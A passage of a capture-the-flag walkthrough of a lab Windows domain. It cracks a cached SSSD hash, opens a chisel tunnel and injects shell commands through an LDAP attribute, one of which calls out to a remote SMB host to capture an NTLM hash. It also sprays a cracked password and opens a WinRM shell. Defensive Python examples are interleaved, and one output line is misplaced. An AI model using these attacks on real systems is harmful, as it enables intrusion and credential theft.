webster@webserver:/etc/sssd$ nslookup windcorp.htb
Server: 192.168.0.2
Address: 192.168.0.2#53
Name: windcorp.htb
Address: 192.168.0.2
Name: windcorp.htb
Address: 10.10.11.179
The extracted directory contains cache_windcorp.htb.ldb, which holds something that looks like a hash:
$ cat cache_windcorp.htb.ldb
If you are not sure of the hash type, just throw it at john:
$ john hash -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pantera (?)
1g 0:00:00:00 DONE (2023-04-18 14:30) 5.555g/s 11377p/s 11377c/s 11377C/s 123456..lovers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
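The hash john just cracked comes from the SSSD cache: with cache_credentials = True the daemon keeps a sha512crypt hash of each domain user's password in cache_<domain>.ldb so that offline logins keep working, which is why a leaked copy of /var/lib/sss/db is enough for an offline attack. The Python script below is an added example, not part of the walkthrough: it parses an sssd.conf (the target's config from above is used as the sample), flags the two options that keep credentials available offline, emits a hardened copy, and scans an ldb-style blob for sha512crypt strings so a responder can confirm whether a copied cache held cached hashes. The ldb sample and the hash inside it are constructed, not real values.

```python
import configparser
import io
import re

# Options in a [domain/...] section that make a leaked /var/lib/sss copy valuable.
# The explanatory text is this example's own wording.
RISKY_DOMAIN_OPTIONS = {
    "cache_credentials":
        "stores a sha512crypt hash of each user's password in cache_<domain>.ldb for offline logins",
    "krb5_store_password_if_offline":
        "keeps the user's password in the kernel keyring while the KDC is unreachable",
}


def _load(text: str) -> configparser.ConfigParser:
    # fallback_homedir uses %u@%d, so interpolation must be off or get() raises.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def audit_sssd(text: str):
    """Return (section, option, message) for each risky option set to true."""
    cp = _load(text)
    findings = []
    for section in cp.sections():
        if not section.startswith("domain/"):
            continue
        for option, message in RISKY_DOMAIN_OPTIONS.items():
            if cp.get(section, option, fallback="false").strip().lower() == "true":
                findings.append((section, option, message))
    return findings


def harden_sssd(text: str) -> str:
    """Return the config with the risky options set to False.
    Trade-off: domain users can then only log in while the DC is reachable."""
    cp = _load(text)
    for section in cp.sections():
        if section.startswith("domain/"):
            for option in RISKY_DOMAIN_OPTIONS:
                cp.set(section, option, "False")
    out = io.StringIO()
    cp.write(out)
    return out.getvalue()


# sha512crypt: $6$[rounds=N$]salt$86-char-digest
SHA512CRYPT_RE = re.compile(rb"\$6\$(?:rounds=\d+\$)?[./A-Za-z0-9]{1,16}\$[./A-Za-z0-9]{86}")


def count_cached_hashes(blob: bytes) -> int:
    """Count sha512crypt strings in a cache_<domain>.ldb blob (cachedPassword values)."""
    return len(SHA512CRYPT_RE.findall(blob))


# The target's sssd.conf as shown in the walkthrough.
SAMPLE_SSSD_CONF = """[sssd]
domains = windcorp.htb
config_file_version = 2
services = nss, pam
[domain/windcorp.htb]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = WINDCORP.HTB
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = windcorp.htb
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
"""

# Constructed ldb-like blob; the hash is a dummy of the right shape, not a real one.
SAMPLE_LDB = (b"objectClass: user\nname: ray.duncan@windcorp.htb\n"
              b"cachedPassword: $6$c0nstructedSalt$" + b"Q" * 86 + b"\n")

if __name__ == "__main__":
    for section, option, message in audit_sssd(SAMPLE_SSSD_CONF):
        print(f"[{section}] {option}: {message}")
    print("cached hashes in sample ldb:", count_cached_hashes(SAMPLE_LDB))
    print(harden_sssd(SAMPLE_SSSD_CONF))
```

Run count_cached_hashes over the real cache_<domain>.ldb files when triaging a backup that left the host; a non-zero count means every user who ever logged in with caching enabled should be treated as having an offline-crackable credential.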
The username can be found in the same file:
Request a Kerberos ticket for ray.duncan and switch identity with ksu, which turns out to authorise root:
webster@webserver:/etc/sssd$ klist
klist: No credentials cache found (filename: /tmp/.cache/krb5cc.6323)
webster@webserver:/etc/sssd$ kinit ray.duncan
Password for ray.duncan@WINDCORP.HTB:
webster@webserver:/etc/sssd$ klist
Ticket cache: FILE:/tmp/.cache/krb5cc.6323
Default principal: ray.duncan@WINDCORP.HTB
Valid starting Expires Service principal
04/18/2023 08:34:33 04/18/2023 13:34:33 krbtgt/WINDCORP.HTB@WINDCORP.HTB
renew until 04/19/2023 08:34:27
webster@webserver:/etc/sssd$ ksu
Authenticated ray.duncan@WINDCORP.HTB
Account root: authorization for ray.duncan@WINDCORP.HTB successful
Changing uid to root (0)
root@webserver:/etc/sssd#
Get Bob.Wood
Locate the domain controller:
root@webserver:~# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.
64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.614 ms
64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.525 ms
^C
--- 192.168.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1017ms
rtt min/avg/max/mdev = 0.525/0.569/0.614/0.044 ms
root@webserver:~# nc -zv 192.168.0.2 88
hope.windcorp.htb [192.168.0.2] 88 (kerberos) open
Upload a static mini nmap and port-scan the target:
root@webserver:~# ./nmap 192.168.0.2 -p1-10000 --min-rate 2000
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-04-18 09:17 CEST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for hope.windcorp.htb (192.168.0.2)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.0043s latency).
Not shown: 9988 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd
636/tcp open ldaps
3268/tcp open unknown
3269/tcp open unknown
5985/tcp open unknown
9389/tcp open unknown
MAC Address: 00:15:5D:10:93:01 (Unknown)
Drop chisel to build a tunnel:
$ ./chisel server -p 8000 --reverse
2023/04/18 15:21:59 server: Reverse tunnelling enabled
2023/04/18 15:21:59 server: Fingerprint oAssYsdw8XNKjduKiPUmpUWCSZpk+r9UOY0H0PrmVog=
2023/04/18 15:21:59 server: Listening on http://0.0.0.0:8000
2023/04/18 15:22:37 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
root@webserver:~# ./chisel client 10.10.16.3:8000 R:socks
This SSH service is probably a Linux subsystem emulated on the DC:
$ proxychains ssh 'ray.duncan@windcorp.htb'@192.168.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 192.168.0.2:22 ... OK
The authenticity of host '192.168.0.2 (192.168.0.2)' can't be established.
ED25519 key fingerprint is SHA256:lQC3oE1gDOR7phAqbAJtVybs3VgxWby/lqL7ySR6/1M.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.2' (ED25519) to the list of known hosts.
ray.duncan@windcorp.htb@192.168.0.2's password:
Linux webserver 5.10.0-17-amd64 #1 SMP Debian 5.10.136-1 (2022-08-13) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 18 08:38:58 2023 from hope.windcorp.htb
Could not chdir to home directory /home/ray.duncan@windcorp.htb: No such file or directory
ray.duncan@windcorp.htb@webserver:/$ whoami
ray.duncan@windcorp.htb
ray.duncan@windcorp.htb@webserver:/$ ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
ray.duncan@windcorp.htb@webserver:/$
From my own machine, I request a ticket for ray.duncan through the proxy:
$ proxychains kinit ray.duncan
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Password for ray.duncan@WINDCORP.HTB:
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
$ ls
chisel chisel_1.8.1_linux_amd64.gz chisel.exe
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: ray.duncan@WINDCORP.HTB
Valid starting Expires Service principal
2023-04-18T15:35:43 2023-04-18T20:35:43 krbtgt/WINDCORP.HTB@WINDCORP.HTB
renew until 2023-04-19T15:34:52
The SMB share holds a debug-users.txt:
$ proxychains smbclient -k //hope.windcorp.htb/WC-Share
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
WARNING: The option -k|--kerberos is deprecated!
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Mon May 2 18:33:07 2022
.. DHS 0 Tue Apr 18 12:34:13 2023
temp D 0 Tue Apr 18 17:04:44 2023
9801727 blocks of size 4096. 3492465 blocks available
smb: > cd temp
smb: temp> ls
. D 0 Tue Apr 18 17:04:44 2023
.. D 0 Mon May 2 18:33:07 2022
debug-users.txt A 88 Tue Apr 18 17:04:44 2023
9801727 blocks of size 4096. 3492449 blocks available
smb: temp> get debug-users.txt
getting file \temp\debug-users.txt of size 88 as debug-users.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: temp>
The contents look like a list of passwords:
$ cat debug-users.txt
IvanJennings43235345
MiriamMills93827637
BenjaminHernandez23232323
RayDuncan9342211
The NETLOGON logon-script share holds a few files:
$ proxychains smbclient -k //hope.windcorp.htb/NETLOGON
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
WARNING: The option -k|--kerberos is deprecated!
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Mon May 2 15:49:18 2022
.. D 0 Tue Apr 26 04:59:55 2022
form.ps1 A 2124 Mon May 2 14:47:14 2022
Update phone.lnk A 2710 Mon May 2 14:37:33 2022
windcorp-logo.png A 47774 Mon May 2 05:45:04 2022
9801727 blocks of size 4096. 3492209 blocks available
smb: >
$ cat form.ps1
#Create Objects
$SysInfo = New-Object -ComObject "ADSystemInfo"
$UserDN = $SysInfo.GetType().InvokeMember("UserName","GetProperty", $Null, $SysInfo, $Null)
$User = [adsi]"LDAP://$($UserDN)"
#Create form
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
$form = New-Object System.Windows.Forms.Form
$form.Text = 'SMS password reset setup'
$form.Size = New-Object System.Drawing.Size(300,200)
$form.StartPosition = 'CenterScreen'
$okButton = New-Object System.Windows.Forms.Button
$okButton.Location = New-Object System.Drawing.Point(75,120)
$okButton.Size = New-Object System.Drawing.Size(75,23)
$okButton.Text = 'OK'
$okButton.DialogResult = [System.Windows.Forms.DialogResult]::OK
$form.AcceptButton = $okButton
$form.Controls.Add($okButton)
$cancelButton = New-Object System.Windows.Forms.Button
$cancelButton.Location = New-Object System.Drawing.Point(150,120)
$cancelButton.Size = New-Object System.Drawing.Size(75,23)
$cancelButton.Text = 'Cancel'
$cancelButton.DialogResult = [System.Windows.Forms.DialogResult]::Cancel
$form.CancelButton = $cancelButton
$form.Controls.Add($cancelButton)
$label = New-Object System.Windows.Forms.Label
$label.Location = New-Object System.Drawing.Point(10,20)
$label.Size = New-Object System.Drawing.Size(280,20)
$label.Text = 'To be able to reset password using SMS,'
$form.Controls.Add($label)
$label = New-Object System.Windows.Forms.Label
$label.Location = New-Object System.Drawing.Point(10,40)
$label.Size = New-Object System.Drawing.Size(280,20)
$label.Text = ' you need to keep it updated:'
$form.Controls.Add($label)
$textBox = New-Object System.Windows.Forms.TextBox
$textBox.Location = New-Object System.Drawing.Point(10,60)
$textBox.Size = New-Object System.Drawing.Size(260,20)
$form.Controls.Add($textBox)
$textBox.Text = $User.Get("mobile")
$form.Topmost = $true
$form.Add_Shown({$textBox.Select()})
$result = $form.ShowDialog()
if ($result -eq [System.Windows.Forms.DialogResult]::OK)
{
    $x = $textBox.Text
    $User.Put("mobile",$x)
    $User.SetInfo()
}
It looks like a form with a single input box. Query LDAP for information:
ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'DC=windcorp,DC=htb' > ldapinfo.txt
The user flag can be read from root's home on the webserver:
root@webserver:~# ls
user.txt
root@webserver:~# cat user.txt
a50c8.......................
The LDAP results include users' mobile numbers:
dn: CN=Ivan Jennings,OU=HR,DC=windcorp,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ivan Jennings
sn: Jennings
givenName: Ivan
distinguishedName: CN=Ivan Jennings,OU=HR,DC=windcorp,DC=htb
instanceType: 4
whenCreated: 20220430082007.0Z
whenChanged: 20220502100306.0Z
uSNCreated: 124122
memberOf: CN=HR,OU=Groups,DC=windcorp,DC=htb
uSNChanged: 156439
name: Ivan Jennings
objectGUID:: mdfR8c5+CUaV6LoVzJ9v1Q==
userAccountControl: 512
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 132959946984632757
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132957804073532966
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAE97tbUcM4vF/kEqjpgoAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Ivan.Jennings
sAMAccountType: 805306368
userPrincipalName: Ivan.Jennings@windcorp.htb
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=windcorp,DC=htb
dSCorePropagationData: 16010101000000.0Z
mobile: 43235345
This matches what is in the SMB share. Presumably a script or scheduled task reads users' mobile numbers and writes them into debug-users.txt on the share, so maybe I can try changing the mobile value:
echo -e 'dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB\nchangetype: modify\nreplace: mobile\nmobile: $(whoami)' | ldapmodify -H ldap://hope.windcorp.htb
This command changes the mobile attribute of one user in the LDAP directory, setting it to "$(whoami)". It has three parts:
- dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB: the distinguished name of the object to modify.
- changetype: modify, replace: mobile, mobile: $(whoami): replace the attribute's old value (if any) with the new value "$(whoami)".
- The modification is sent to the LDAP server with ldapmodify over the LDAP protocol (ldap://hope.windcorp.htb).
Then look at debug-users.txt on the SMB share again:
$ cat debug-users.txt
IvanJennings43235345
MiriamMills93827637
BenjaminHernandez23232323
RayDuncanwindcorp\scriptrunner
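The debug-users.txt line for Ray Duncan shows that whatever script builds the file evaluates the mobile attribute in a shell rather than treating it as data. The Python script below is an added example, not the target's script: it validates a mobile value against the only shape a phone number should have, flags directory entries whose value carries command-substitution or other shell metacharacters, checks each line of a debug-users.txt dump against the expected Name+digits shape so an injected entry stands out, and shows the safe way to render a line. The directory entries are constructed; the debug-users lines are the ones shown above.

```python
import re

# A phone number field should only ever contain digits (optionally a leading +).
MOBILE_RE = re.compile(r"^\+?[0-9]{4,15}$")
# Expected shape of one debug-users.txt line: FirstnameLastname followed by the number.
DEBUG_LINE_RE = re.compile(r"^[A-Za-z]+\+?[0-9]{4,15}$")
# Sequences that only make sense if the value is going to be evaluated by a shell.
SHELL_META_RE = re.compile(r"\$\(|\$\{|`|[;|&<>\n]")


def is_safe_mobile(value: str) -> bool:
    """True only for a plain phone number."""
    return bool(MOBILE_RE.match(value))


def find_injected_values(entries):
    """entries: iterable of (dn, mobile). Return (dn, reason) for every entry whose
    mobile attribute is not a plain phone number."""
    findings = []
    for dn, mobile in entries:
        if is_safe_mobile(mobile):
            continue
        reason = "shell metacharacters" if SHELL_META_RE.search(mobile) else "not a phone number"
        findings.append((dn, reason))
    return findings


def check_debug_users(lines):
    """Return the lines of a debug-users.txt dump that do not have the Name+digits
    shape, i.e. where something other than a number was expanded into the file."""
    return [line for line in lines if line and not DEBUG_LINE_RE.match(line)]


def render_debug_line(given: str, surname: str, mobile: str) -> str:
    """Safe equivalent of what the scheduled script appears to do: the value is
    validated and concatenated as data, never handed to a shell."""
    if not is_safe_mobile(mobile):
        raise ValueError(f"refusing to render non-numeric mobile for {given} {surname}")
    return f"{given}{surname}{mobile}"


# Constructed directory entries; the mobile values are the two seen on this page.
SAMPLE_ENTRIES = [
    ("CN=Ivan Jennings,OU=HR,DC=windcorp,DC=htb", "43235345"),
    ("CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB", "$(whoami)"),
]
# The debug-users.txt lines shown above, after the attribute was changed.
SAMPLE_DEBUG_LINES = [
    "IvanJennings43235345",
    "MiriamMills93827637",
    "BenjaminHernandez23232323",
    "RayDuncanwindcorp\\scriptrunner",
]

if __name__ == "__main__":
    for dn, reason in find_injected_values(SAMPLE_ENTRIES):
        print(f"suspicious mobile on {dn}: {reason}")
    for line in check_debug_users(SAMPLE_DEBUG_LINES):
        print(f"unexpected debug-users line: {line!r}")
    print(render_debug_line("Ivan", "Jennings", "43235345"))
```

Both checks are cheap to run on a schedule: find_injected_values over an LDAP export catches the attribute before the job consumes it, and check_debug_users over the share's output catches the case after the fact. Validating the attribute at write time (an allow-list on the form in form.ps1, or a directory-side constraint) would have removed the injection point entirely.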
So command injection seems possible. Let's see whether an NTLMv2 hash can be captured directly:
echo -e 'dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB\nchangetype: modify\nreplace: mobile\nmobile: $(net use \\10.10.16.3\share)' | ldapmodify -H ldap://hope.windcorp.htb
Nothing: the target apparently has no outbound connectivity.
So drop an SMB server onto the webserver instead (static Impacket binaries: https://github.com/ropnop/impacket_static_binaries/releases):
echo -e 'dn: CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB\nchangetype: modify\nreplace: mobile\nmobile: $(net use \\webserver.windcorp.htb\share)' | ldapmodify -H ldap://hope.windcorp.htb
root@webserver:~# ./smbserver share . -smb2support
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,58190)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*] User HOPE\scriptrunner authenticated successfully
[*] scriptrunner::WINDCORP:4141414141414141:5fb69b1d2c51fcc5bb86b03f33a0bc3c:
$ john hash1 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@p%i&J#iNNo1T2 (scriptrunner)
1g 0:00:00:02 DONE (2023-04-19 11:14) 0.5000g/s 7171Kp/s 7171Kc/s 7171KC/s "chinor23"..*7¡Vamos!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
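To make sense of the captured line (and of what john is fed), here is an added example, not from the original post, that splits a NetNTLMv2 line into its fields and decodes the client-challenge blob: the timestamp, the client nonce, and the AV pairs naming the server the client believed it was talking to. The sample line reuses the user, domain, server challenge and NTProofStr from the capture above; the blob is constructed locally because the page's own is cut off. The constant server challenge 4141414141414141 is what impacket's smbserver hands out by default, which is itself a useful indicator when triaging such a capture.

```python
import re

# john/hashcat "netntlmv2" line: user::DOMAIN:server_challenge:NTProofStr:blob (hex fields)
NETNTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-fA-F]{16}):"
    r"(?P<ntproofstr>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$"
)

# MS-NLMP AV_PAIR ids whose value is a UTF-16LE name
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 9: "TargetName"}


def parse_av_pairs(data: bytes) -> dict:
    """Walk the AV_PAIR list (AvId u16, AvLen u16, value) until MsvAvEOL (id 0)."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id = int.from_bytes(data[off:off + 2], "little")
        av_len = int.from_bytes(data[off + 2:off + 4], "little")
        off += 4
        if av_id == 0:
            break
        value = data[off:off + av_len]
        off += av_len
        if av_id in AV_NAMES:
            pairs[AV_NAMES[av_id]] = value.decode("utf-16-le", errors="replace")
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Split a captured NetNTLMv2 line and decode the NTLMv2_CLIENT_CHALLENGE blob
    (MS-NLMP 2.2.2.7): RespType(1) HiRespType(1) Reserved1(2) Reserved2(4)
    TimeStamp(8) ChallengeFromClient(8) Reserved3(4) AvPairs(...)."""
    m = NETNTLMV2_RE.match(line.strip())
    if not m:
        raise ValueError("not a NetNTLMv2 line")
    d = m.groupdict()
    blob = bytes.fromhex(d["blob"])
    if len(blob) < 28 or blob[0:2] != b"\x01\x01":
        raise ValueError("blob lacks the NTLMv2 client-challenge header")
    filetime = int.from_bytes(blob[8:16], "little")  # 100 ns ticks since 1601-01-01
    d["timestamp_unix"] = filetime // 10_000_000 - 11_644_473_600
    d["client_challenge"] = blob[16:24].hex()
    d["av_pairs"] = parse_av_pairs(blob[28:])
    # impacket's smbserver issues a fixed 'AAAAAAAA' server challenge by default; seeing
    # it in a capture is a strong hint the client authenticated to a rogue SMB listener
    d["static_challenge"] = d["challenge"].lower() == "4141414141414141"
    return d


def _constructed_blob() -> str:
    """Build a plausible blob offline (constructed; the walkthrough's own is truncated)."""
    filetime = (1_681_862_400 + 11_644_473_600) * 10_000_000  # 2023-04-19T00:00:00Z
    av = b""
    for av_id, name in ((2, "WINDCORP"), (1, "HOPE"), (3, "hope.windcorp.htb")):
        value = name.encode("utf-16-le")
        av += av_id.to_bytes(2, "little") + len(value).to_bytes(2, "little") + value
    av += b"\x00\x00\x00\x00"  # MsvAvEOL
    blob = (b"\x01\x01" + b"\x00\x00" + b"\x00\x00\x00\x00"
            + filetime.to_bytes(8, "little") + bytes.fromhex("0102030405060708")
            + b"\x00\x00\x00\x00" + av + b"\x00\x00\x00\x00")
    return blob.hex()


# Constructed sample: user, domain, challenge and NTProofStr as in the capture above,
# blob built locally.
SAMPLE_LINE = ("scriptrunner::WINDCORP:4141414141414141:"
               "5fb69b1d2c51fcc5bb86b03f33a0bc3c:" + _constructed_blob())

if __name__ == "__main__":
    info = parse_netntlmv2(SAMPLE_LINE)
    for key in ("user", "domain", "challenge", "static_challenge",
                "timestamp_unix", "client_challenge", "av_pairs"):
        print(f"{key}: {info[key]}")
```

The AV pairs are the interesting part for a defender: they record the NetBIOS and DNS names the client was told it was talking to, so a capture whose target names do not match the host the share supposedly lived on points straight at the rogue listener.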
webster@webserver:~$ ksu
account root: authorization failed
webster@webserver:~$ kinit ray.duncan
Password for [email protected]:
webster@webserver:~$ ksu
Authenticated [email protected]
Account root: authorization for [email protected] successful
Changing uid to root (0)
<b\share)' | ldapmodify -H ldap://hope.windcorp.htb
SASL/GSS-SPNEGO authentication started
SASL username: [email protected]
SASL SSF: 256
SASL data security layer installed.
modifying entry "CN=RAY DUNCAN,OU=DEVELOPMENT,DC=WINDCORP,DC=HTB"
root@webserver:/home/webster#
We have a password; use ldapsearch to enumerate domain users:
ldapsearch -H ldap://hope.windcorp.htb -b "DC=WINDCORP,DC=HTB" sAMAccountName "CN=Users,DC=windcorp,DC=HTB" | grep sAMAccountName | awk '{print $2}' > domainusers
Then upload kerbrute and spray it:
./kerbrute passwordspray -d windcorp.htb domainusers '!@p%i&J#iNNo1T2'
Two users accept it:
Version: v1.0.3 (9dad6e1) - 04/19/23 - Ronnie Flathers @ropnop
2023/04/19 05:57:10 > Using KDC(s):
2023/04/19 05:57:10 > hope.windcorp.htb:88
2023/04/19 05:57:11 > [+] VALID LOGIN: [email protected]:!@p%i&J#iNNo1T2
2023/04/19 05:57:16 > [+] VALID LOGIN: [email protected]:!@p%i&J#iNNo1T2
2023/04/19 05:57:16 > Done! Tested 597 logins (2 successes) in 6.410 seconds
root@webserver:~#
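From the blue-team side, a spray like the kerbrute run above leaves one source address producing KDC_ERR_PREAUTH_FAILED (0x18) failures for many different accounts within seconds, followed by a 4768 TGT request for the accounts that matched. The following is an added example, not part of the original walkthrough, that implements that rule over a constructed, simplified log format (one event per line carrying the relevant 4768/4771 fields; a real deployment would read these from the DC's Security log). The field names and the threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified rendering of DC security-log events (field names borrowed
# from the real 4768/4771 events; this is not EVTX or XML parsing).
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) EventID=(?P<eid>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)(?: Status=(?P<status>0x[0-9a-fA-F]+))?$"
)

KDC_ERR_PREAUTH_FAILED = "0x18"  # wrong password in a Kerberos AS-REQ


def parse_line(line: str):
    """Return a dict for a matching line, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "eid": int(m["eid"]),
        "user": m["user"].lower(),
        "ip": m["ip"],
        "status": (m["status"] or "").lower(),
    }


def detect_spray(lines, window=timedelta(seconds=60), min_accounts=10) -> dict:
    """Flag sources whose 4771/0x18 failures touch >= min_accounts distinct accounts
    inside any `window`, and list which accounts the same source then got a TGT for."""
    events = [e for e in map(parse_line, lines) if e]
    failures, successes = defaultdict(list), defaultdict(set)
    for e in events:
        if e["eid"] == 4771 and e["status"] == KDC_ERR_PREAUTH_FAILED:
            failures[e["ip"]].append((e["ts"], e["user"]))
        elif e["eid"] == 4768:
            successes[e["ip"]].add(e["user"])
    alerts = {}
    for ip, evs in failures.items():
        evs.sort()  # sliding window over time-ordered failures from this source
        for i, (start, _) in enumerate(evs):
            users = {u for t, u in evs[i:] if t - start <= window}
            if len(users) >= min_accounts:
                alerts[ip] = {"accounts": sorted(users),
                              "successes": sorted(successes.get(ip, ()))}
                break
    return alerts


# Constructed sample: a spray from one host (12 accounts in 6 seconds, two hits),
# plus a single user mistyping a password from elsewhere, which must not alert.
SAMPLE_LOG = [
    f"2023-04-19 05:57:{10 + i // 2:02d} EventID=4771 TargetUserName=user{i:02d} "
    f"IpAddress=::ffff:192.168.0.2 Status=0x18"
    for i in range(12)
] + [
    "2023-04-19 05:57:11 EventID=4768 TargetUserName=scriptrunner IpAddress=::ffff:192.168.0.2",
    "2023-04-19 05:57:16 EventID=4768 TargetUserName=bob.wood IpAddress=::ffff:192.168.0.2",
    "2023-04-19 05:58:01 EventID=4771 TargetUserName=ivan.jennings IpAddress=::ffff:10.0.0.5 Status=0x18",
    "2023-04-19 05:58:04 EventID=4771 TargetUserName=ivan.jennings IpAddress=::ffff:10.0.0.5 Status=0x18",
    "2023-04-19 05:58:09 EventID=4771 TargetUserName=ivan.jennings IpAddress=::ffff:10.0.0.5 Status=0x18",
]

if __name__ == "__main__":
    for ip, hit in detect_spray(SAMPLE_LOG).items():
        print(f"spray from {ip}: {len(hit['accounts'])} accounts tried, "
              f"TGT issued for {hit['successes']}")
```

Counting distinct accounts per source (rather than failures per account) is what separates a spray from ordinary lockout noise: the second host in the sample fails three times, but against a single account, and stays silent.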
The scriptrunner user can't log in, but Bob.Wood can:
$ proxychains kinit bob.wood
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Password for [email protected]:
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
$ proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:\Users\Bob.Wood\Documents>
